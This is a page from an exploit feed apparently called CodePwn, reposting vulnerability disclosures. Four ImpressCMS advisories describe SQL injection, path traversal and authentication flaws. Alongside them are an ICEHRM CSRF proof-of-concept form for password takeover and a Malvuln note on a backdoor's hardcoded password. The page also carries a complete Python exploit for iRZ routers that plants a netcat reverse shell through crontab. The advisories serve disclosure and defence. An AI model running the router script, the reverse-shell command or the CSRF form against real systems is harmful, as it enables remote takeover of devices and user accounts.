Latest exploits :: CodePwn

<pre><code>--------------------------------------------------------------- ImpressCMS <= 1.4.3 (findusers.php) SQL Injection Vulnerability --------------------------------------------------------------- [-] Software Link: https://www.impresscms.org [-] Affected Versions: Version 1.4.3 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /include/findusers.php script: 281. $total = $user_handler->getUserCountByGroupLink(@$_POST["groups"], $criteria); 282. 283. $validsort = array("uname", "email", "last_login", "user_regdate", "posts"); 284. $sort = (!in_array($_POST['user_sort'], $validsort)) ? "uname" : $_POST['user_sort']; 285. $order = "ASC"; 286. if (isset($_POST['user_order']) && $_POST['user_order'] == "DESC") { 287. $order = "DESC"; 288. } 289. 290. $criteria->setSort($sort); 291. $criteria->setOrder($order); 292. $criteria->setLimit($limit); 293. $criteria->setStart($start); 294. $foundusers = $user_handler->getUsersByGroupLink(@$_POST["groups"], $criteria, TRUE); User input passed through the "groups" POST parameter is not properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and icms_member_Handler::getUsersByGroupLink() methods at lines 281 and 294. These methods use the first argument to construct a SQL query without proper validation, and this can be exploited by remote attackers to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection attacks. The application allows for stacked SQL queries, as such this vulnerability could be exploited to e.g. create a new admin user and execute arbitrary PHP code. [-] Solution: Upgrade to version 1.4.4 or later. [-] Disclosure Timeline: [19/01/2021] - Vendor notified through HackerOne [29/01/2021] - Vulnerability acknowledged by the vendor [03/02/2021] - CVE number assigned [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed [11/02/2022] - Vendor was informed about the ineffective fix [09/03/2022] - Version 1.4.4 released [22/03/2022] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2021-26599 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://hackerone.com/reports/1081145 [-] Original Advisory: http://karmainsecurity.com/KIS-2022-04 </code></pre>

<pre><code>-------------------------------------------------------------------------- ImpressCMS <= 1.4.2 (findusers.php) Incorrect Access Control Vulnerability -------------------------------------------------------------------------- [-] Software Link: https://www.impresscms.org [-] Affected Versions: Version 1.4.2 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /include/findusers.php script: 16. include "../mainfile.php"; 17. xoops_header(false); 18. 19. $denied = true; 20. if (!empty($_REQUEST['token'])) { 21. if (icms::$security->validateToken($_REQUEST['token'], false)) { 22. $denied = false; 23. } 24. } elseif (is_object(icms::$user) && icms::$user->isAdmin()) { 25. $denied = false; 26. } 27. if ($denied) { 28. icms_core_Message::error(_NOPERM); 29. exit(); 30. } } This script should be accessible to authenticated users only. However, because of the "if" statement at lines 20-23, this script could be accessed by unauthenticated attackers if they will provide a valid security token. Such a token will be generated in several places within the application, and some of them do not require the user to be authenticated, like in the misc.php script. This might be exploited to access an otherwise restricted functionality of the application, which in turn might allow an information disclosure about the CMS users. [-] Solution: Upgrade to version 1.4.3 or later. [-] Disclosure Timeline: [19/01/2021] - Vendor notified through HackerOne [03/02/2021] - CVE number assigned [06/02/2022] - Version 1.4.3 released [22/03/2022] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2021-26598 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://hackerone.com/reports/1081137 [-] Original Advisory: http://karmainsecurity.com/KIS-2022-03 </code></pre>

<pre><code>----------------------------------------------------------------- ImpressCMS <= 1.4.2 (image-edit.php) Path Traversal Vulnerability ----------------------------------------------------------------- [-] Software Link: https://www.impresscms.org [-] Affected Versions: Version 1.4.2 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /libraries/image-editor/image-edit.php script: 161. if (@copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $simage->getVar ( 'image_name' ) )) { 162. if (@unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp )) { 163. $msg = _MD_AM_DBUPDATED; [...] 190. } else { 191. if (copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $imgname )) { 192. @unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp ); 193. } User input passed through the "image_temp" parameter is not properly sanitized before being used in a call to the unlink() function at lines 162 and 192. This can be exploited by authenticated attackers to carry out Path Traversal attacks and delete arbitrary files in the context of the web server process. This vulnerability could be exploited also to disclose the content of arbitrary files in case the web server allows for directory listing. [-] Solution: Upgrade to version 1.4.3 or later. [-] Disclosure Timeline: [19/01/2021] - Vendor notified through HackerOne [29/01/2021] - Vulnerability acknowledged by the vendor [03/02/2021] - CVE number assigned [06/02/2022] - Version 1.4.3 released [22/03/2022] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2021-26601 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://hackerone.com/reports/1081878 [-] Original Advisory: http://karmainsecurity.com/KIS-2022-02 </code></pre>

<pre><code># Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover # Date: 18/03/2022 # Exploit Author: Devansh Bordia # Vendor Homepage: https://icehrm.com/ # Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS # Version: 31.0.0.OS #Tested on: Windows 10 1. About - ICEHRM IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. 2. Description: The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. 3. Steps To Reproduce: - Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password. - Now login into the application using his credentials and navigate to Update Password Feature to change the password. - Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used. - Finally using Burpsuite create CSRF POC and save it as exploit.html. - Now change the password in the POC to any password we want. - Finally we open this POC in the same browser session and click on the submit button. - At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover. 4. Vulnerable Request: GET /app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123 ","pwd":"Dummy@123"} HTTP/1.1 Host: localhost:8070 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin 5. Exploit POC (exploit.html) <html>  <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8070/app/service.php"> <input type="hidden" name="t" value="Employee" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="modules=employees" /> <input type="hidden" name="req" value="{"current":"Test@123","pwd":"Dummy@123"}" /> <input type="submit" value="Submit request" /> </form> </body> </html> </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/eba3dd81723ddf33621fd85ded577920.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.BirdSpy.b Vulnerability: Weak Hardcoded Credentials Family: BirdSpy Type: PE32 MD5: eba3dd81723ddf33621fd85ded577920 Vuln ID: MVID-2022-0523 Dropped files: WinSock.exe Disclosure: 03/21/2022 Description: The malware listens on TCP port 50829. Authentication is required, however the password "ccbird" is weak and hardcoded in the PE file. 00401E0E mov esi, offset Data ; "ccbird" 00401E13 push 0 ; flags 00401E15 push esi ; Str Built-in commands: ================== byby "kill the malware" delp "terminate process" exec "shellexecute pgm" dlog HATE "send a message" getd "get drives" regw "write to registry" Exploit/PoC: nc64.exe x.x.x.x 50829 ccbird pwok Welcome to Januse's BirdSPY Januse0128 sysJanuse0128gsys msgeSystem: Windows NT Version:6.2 BuildNumber:9200 System Info:''Januse0128 Januse0128dlog HATE Januse0128bird BirdSPY Release version 1..by JanuseChiu ME.NCU.EDU.TW...YAJanuse0128 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: iRZ Mobile Router - CSRF to RCE # Google Dork: intitle:"iRZ Mobile Router" # Date: 2022-03-18 # Exploit Author: Stephen Chavez & Robert Willis # Vendor Homepage: https://en.irz.ru/ # Software Link: https://github.com/SakuraSamuraii/ez-iRZ # Version: Routers through 2022-03-16 # Tested on: RU21, RU21w, RL21, RU41, RL01 # CVE : CVE-2022-27226 import os import requests import json import subprocess option = "0" def main(): print("####################################################") print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #") print("####################################################") print() print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##") print() print("1. Post Authentication RCE (Needs Credentials)") print("2. CSRF to RCE (No Credentials)") print() runit() def runit(): option = input("Select an option: ") if option == "1": exploit1() elif option == "2": exploit2() else: print("You must select '1' or '2'. Exiting.") def exploit1(): print("## Running Post Auth RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") router_user = input("## Enter the username for the router login: ") router_pass = input("## Enter the password for the router login: ") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") router_url = f'http://{router_ip}:{router_port}' nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}' input(nc1_str + "\n\nPress enter once you do") send_json_payload(router_url, router_user, router_pass, LHOST, LPORT) def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port): intro = f'Sending the payload to {router_url}\n' print(intro) payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \ f'{lhost_ip} {lhost_port} ' + \ '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}' payload_json = json.loads(payload_str) s = requests.Session() s.auth = (router_user, router_pass) s.headers.update( {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}) s.headers.update({"X-Requested-With": "XMLHttpRequest"}) s.headers.update({"Origin": router_url}) s.headers.update({"Referer": router_url}) s.post(router_url + "/api/crontab", json=payload_json) exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f' print( "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str) print("To fix TTY: type telnet 0.0.0.0 in the shell") def exploit2(): print("## Running CSRF to RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") load_csrf_poc_file(router_ip, router_port, LHOST, LPORT) def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port): file_path = os.path.dirname(__file__) + os.sep + "poc.template.html" if os.path.isfile(file_path): with open(file_path) as poc_file: original_poc_data_str = poc_file.read() new_html = original_poc_data_str.replace("{router_ip}", router_ip) new_html = new_html.replace( "{router_port}", str(router_port)) lhost_split_arr = lhost_ip.split(".") if len(lhost_split_arr) == 4: new_html = new_html.replace( "{lhost_ip_octect_1}", lhost_split_arr[0]) new_html = new_html.replace( "{lhost_ip_octect_2}", lhost_split_arr[1]) new_html = new_html.replace( "{lhost_ip_octect_3}", lhost_split_arr[2]) new_html = new_html.replace( "{lhost_ip_octect_4}", lhost_split_arr[3]) new_html = new_html.replace( "{lhost_port}", lhost_port) new_file_path = os.path.dirname( __file__) + os.sep + "poc.new.html" try: with open(new_file_path, 'w') as new_file: new_file.write(new_html) print() print( f'New file written to {new_file_path}. Host this file') except FileNotFoundError: print("You had an error writing to the file, doesn't exist.") else: print(f'{lhost_ip} is not a proper IPV4 address.') else: print(f'{file_path} not found') main() </code></pre>

<pre><code>----------------------------------------------------------------------- ImpressCMS <= 1.4.2 (autologin.php) Authentication Bypass Vulnerability ----------------------------------------------------------------------- [-] Software Link: https://www.impresscms.org [-] Affected Versions: Version 1.4.2 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /plugins/preloads/autologin.php script: 45. $uname = $myts->stripSlashesGPC($autologinName); 46. $pass = $myts->stripSlashesGPC($autologinPass); 47. if (empty($uname) || is_numeric($pass)) { 48. $user = false ; 49. } else { 50. // V3 51. $uname4sql = addslashes($uname); 52. $criteria = new icms_db_criteria_Compo(new icms_db_criteria_Item('login_name', $uname4sql)); 53. $user_handler = icms::handler('icms_member_user'); 54. $users = $user_handler->getObjects($criteria, false); 55. if (empty($users) || count($users) != 1) { 56. $user = false ; 57. } else { 58. // V3.1 begin 59. $user = $users[0] ; 60. $old_limit = time() - (defined('ICMS_AUTOLOGIN_LIFETIME') ? ICMS_AUTOLOGIN_LIFETIME : 604800); 61. list($old_Ynj, $old_encpass) = explode(':', $pass); 62. if (strtotime($old_Ynj) < $old_limit || md5($user->getVar('pass') . 63. ICMS_DB_PASS . ICMS_DB_PREFIX . $old_Ynj) != $old_encpass) 64. { 65. $user = false; 66. } User input passed through the "autologin_uname" and "autologin_pass" cookie values is being used at lines 51-54 to fetch an user object from the database, and then at lines 62-63 to check the correctness of the user's password. The vulnerability exists because of an unsafe way of comparing those parameters, due to comparison operator != is being used instead of !== within the "if" statement at lines 62-63. The latter operator returns "true" only if the compared values are equal and the same type, while the first compares the values after "type juggling". This might be exploited to potentially bypass the authentication mechanism and login as any user without the knowledge of the password. [-] Solution: Upgrade to version 1.4.3 or later. [-] Disclosure Timeline: [20/01/2021] - Vendor notified through HackerOne [02/02/2021] - Vendor replied this has been resolved and will be in ImpressCMS 1.4.3 [03/02/2021] - CVE number assigned [06/02/2022] - Version 1.4.3 released [22/03/2022] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2021-26600 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://hackerone.com/reports/1081986 [-] Original Advisory: http://karmainsecurity.com/KIS-2022-01 </code></pre>